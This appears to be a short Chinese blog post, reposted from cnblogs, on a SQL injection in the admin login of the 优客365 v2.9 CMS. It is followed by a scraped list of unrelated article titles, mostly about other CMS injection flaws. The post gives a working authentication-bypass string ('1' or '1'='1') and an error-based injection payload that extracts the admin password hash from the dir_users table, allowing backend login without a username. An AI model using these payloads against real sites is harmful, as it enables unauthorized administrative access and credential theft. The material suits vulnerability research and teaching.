安装

打开后台登陆界面

http://localhost:9096/yk365/system/login.php

输入单引号报错

得到表名

经过跟踪后在\module\login.php文件出现错误

代码处理不严谨。根据上图,经测试,用户名可以用1' or '1'='1进行绕过

但密码经过md5加密

接下来通过SQL注入得到md5加密后的密码

payload:' and (select 1 from(select count(*),concat(0x7e,(select user_pass from dir_users where user_id=1),0x7e,floor(rand(0)*2)) x from information_schema.columns group by x)a)--+

用sqlmap跑的时候跑不出

可以利用此方法在不知道用户名的情况下登陆进后台

转载于:https://www.cnblogs.com/wh4am1/p/7821811.html

优客365 v2.9版本 后台存在SQL注入相关推荐

  1. thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...

  2. 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...

  3. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  4. /plus/recommend.php sql注入漏洞,代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法 | Seay 渗透 编程 代码审计 网络安全博客...

    显示不全请点击全屏阅读 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商 ...

  5. 某游戏公司后台数据库SQL注入事件分析

    某游戏公司后台数据库SQL注入事件分析 人物关系简介 Blank –SA Dawn(Boss) Ryan –DBA Fred –离开公司的安全顾问 本案例出自于<Unix/Linux网络日志分析 ...

  6. Baidu某系统后台存在sql注入漏洞

    漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  7. php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞

    漏洞分析 首先看下面的代码 /phpcms/modules/member/content.php 202行 edit函数 [php] public function edit() { $_userna ...

  8. 通达OA v11.7后台SQL注入

    文章目录 漏洞描述 漏洞影响 漏洞分析 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器. 漏洞影响 通达OA <= v11.7 漏洞分析 下载通达o ...

  9. 基于pikachu漏洞平台的 --SQL注入攻击学习与总结

    SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...

  10. Metinfo 5.3.17 前台SQL注入漏洞分析及实验

    2017年08月07日  漏洞分析                作者:phith0n@长亭科技 原文地址:https://paper.seebug.org/371/ Metinfo 8月1日升级了版 ...

最新文章

  1. iOS--SDAutolayout宽度自适应
  2. input hidden的值存储在哪儿_kafka内核:消息存储模块的工作机制
  3. pythonmkdir语法错误_Python mkdir一个有难度的问题
  4. MySQL中select * for update锁表的范围
  5. arm linux驱动 知乎_引导 ARM Linux
  6. Deep Learning Notes: Chapter 1 Introduction
  7. 数据治理之数据质量管理
  8. 现代密码学概论|密码学基础--仿射密码实验C语言(文末附上C语言源代码)
  9. 如何批量查询身份证号码地址归属地,身份证性别男女,星座,身份证生肖,身份证年龄以及身份证是否校验合法,一篇文章介绍清楚
  10. 前中后序遍历的相互转化(附代码)
  11. 防火墙OPNsense安装
  12. 中M22春C、Java入门练习( 7-13 后天 )
  13. 北斗在线app服务器,北斗卫星导航app,北斗卫星导航app官网手机版预约 v1.0 - 浏览器家园...
  14. Linux配置文件-limits.conf
  15. Ubuntu18解决:Not creating XLA devices, tf_xla_enable_xla_devices not set
  16. 如何使用网线连接树莓派和电脑
  17. Glide加载图片模糊问题
  18. 【redis】二、redis数据类型
  19. 一维表转二维表(mysql)
  20. CentOS7 系统安全加固实施方案介绍

热门文章

  1. 大连理工大学计算机视觉实验室,首个镜子分割网络问世,大连理工、鹏城实验室、香港城大出品 | ICCV 2019...
  2. 西安工程大学计算机是几本专业,2016年西安工程大学计算机科学与技术(卓越班)专业在陕西录取分数线...
  3. linux安装 web2py,TurnkeyLinux上用于Web2Py到MySQL的DAL连接字符串
  4. 5.Hbase API 操作开发
  5. MultiRow发现之旅(五)- MultiRow版俄罗斯方块(exe + 源码)
  6. 升级 Xcode 4.3 后找不到 xcodebuild 的解决方法
  7. Android碎碎念 -- 广播LocalBroadcastManager的实现
  8. linux(ubuntu) 查看系统设备信息
  9. 微软2012年突破重围 主攻Windows Phone
  10. Android学习笔记--Android开发时常用控件(一)